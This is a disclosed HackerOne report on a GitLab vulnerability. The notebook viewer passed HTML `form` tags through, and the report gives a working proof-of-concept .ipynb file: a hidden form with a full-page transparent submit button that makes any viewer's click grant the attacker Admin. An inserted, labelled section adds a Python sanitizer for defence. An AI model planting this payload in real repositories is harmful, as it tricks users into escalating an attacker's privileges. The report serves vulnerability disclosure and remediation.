Issue any http requests when users view a .ipynb notebook and click anywhere
**[HackerOne report #1563379](https://hackerone.com/reports/1563379)** by `yvvdwf` on 2022-05-09, assigned to `GitLab Team`:
[Report](#report) | [Attachments](#attachments)
## Report
##### Summary
Hello,
The sanitization in the .ipynb notebook viewer does not exclude the `form` tag. Consequently, attackers may introduce a `form` that sends arbitrary POST requests to the server. PUT, DELETE and PATCH requests can be achieved by setting the value of the `_method` field.
Attackers may also use the `class` attribute to turn the form's submit button into a topmost transparent layer that intercepts users' clicks. In the following example, clicking anywhere on the webpage triggers the form submission.
##### Steps to reproduce
1. In an existing project (or a new one), add a file `notebook-test.ipynb` (you can change the basename, but the `.ipynb` extension is important) with the following content:
```json
{
  "cells": [
    {
      "cell_type": "code",
      "source": [ "print(\"Hello world\")" ],
      "outputs": [
        {
          "data": {
            "text/html": [
              "<form action=/api/v4/users/5212593 method=post>",
              "<input name=_method value=PUT type=hidden>",
              "<input name=admin value=true type=hidden>",
              "<input type=submit class='fixed-top fixed-bottom text-hide gl-font-size-42 cursor-default' value='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'>"
            ]
          }
        }
      ]
    }
  ]
}
```
2. After committing the file, view it and click anywhere on the webpage. You will see a POST request to `/api/v4/users/5212593`. This is an example of escalating my account to Admin.
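As an added defensive illustration (not part of the report and not GitLab's own code), the following allowlist sanitizer for notebook `text/html` outputs drops `form`/`input` elements, withholds `class` and `style`, and reports what it removed; it is run over a constructed cell mirroring the PoC above. The tag and attribute lists are my own choices, not GitLab's.

```python
import html
import json
from html.parser import HTMLParser

# Allowlist of what a rendered notebook output legitimately needs. form, input, button,
# script and iframe are absent, so the sanitizer drops them instead of passing them through.
ALLOWED_TAGS = {"p", "div", "span", "pre", "code", "b", "i", "em", "strong", "br", "table", "tr", "th", "td", "ul", "ol", "li"}
ALLOWED_ATTRS = {"colspan", "rowspan", "title"}  # no class/style: the report uses class to build the overlay

class OutputSanitizer(HTMLParser):
    """Re-serialises markup keeping only allowlisted tags/attributes and records dropped tags."""
    def __init__(self):
        super().__init__()  # convert_charrefs=True: text arrives decoded and is re-escaped below
        self.out, self.dropped = [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)  # element removed; any text inside it still passes as text
            return
        kept = " ".join(f'{k}="{html.escape(v or "")}"' for k, v in attrs if k in ALLOWED_ATTRS)
        self.out.append(f"<{tag} {kept}>" if kept else f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize_notebook_html(notebook_json):
    """Sanitise every text/html output in an .ipynb; returns (cleaned dict, list of dropped tags)."""
    nb, dropped = json.loads(notebook_json), []
    for cell in nb.get("cells", []):
        for output in cell.get("outputs", []):
            data = output.get("data", {})
            if "text/html" in data:
                raw = data["text/html"]  # nbformat stores long text as a list of lines
                parser = OutputSanitizer()
                parser.feed("".join(raw) if isinstance(raw, list) else raw)
                parser.close()
                data["text/html"] = "".join(parser.out)
                dropped.extend(parser.dropped)
    return nb, dropped

# Constructed sample mirroring the report's PoC cell (button label shortened, one benign line added).
POC_NOTEBOOK = json.dumps({"cells": [{"cell_type": "code", "outputs": [{"data": {"text/html": [
    "<form action=/api/v4/users/5212593 method=post>",
    "<input name=_method value=PUT type=hidden>", "<input name=admin value=true type=hidden>",
    "<input type=submit class='fixed-top fixed-bottom text-hide' value='zzz'>",
    "<p>legit <b>output</b></p>"]}}]}]})
```

The `dropped` list doubles as a detection signal: a notebook whose outputs shed `form`, `input` or `script` tags is worth flagging in review or a CI check before it is rendered to users.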
##### Impact
Attackers may trick users into performing unintended actions, such as (1) adding the attacker as an Admin or to a private group, or (2) adding the attacker's SSH key.
##### Examples
This example is in private mode; please tell me if you cannot access it: https://gitlab.com/yvvdwf/xss/-/blob/master/notebook-form.ipynb
##### What is the current *bug* behavior?
The sanitization does not exclude the `form` tag.
##### What is the expected *correct* behavior?
The `form` tag should be excluded.
##### Output of checks
This bug happens on GitLab.com.
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [Screenshot_2022-05-09_at_13.33.47.png](https://h1.sec.gitlab.net/a/3855d0b0-269a-481f-a9df-b08656938e73/Screenshot_2022-05-09_at_13.33.47.png)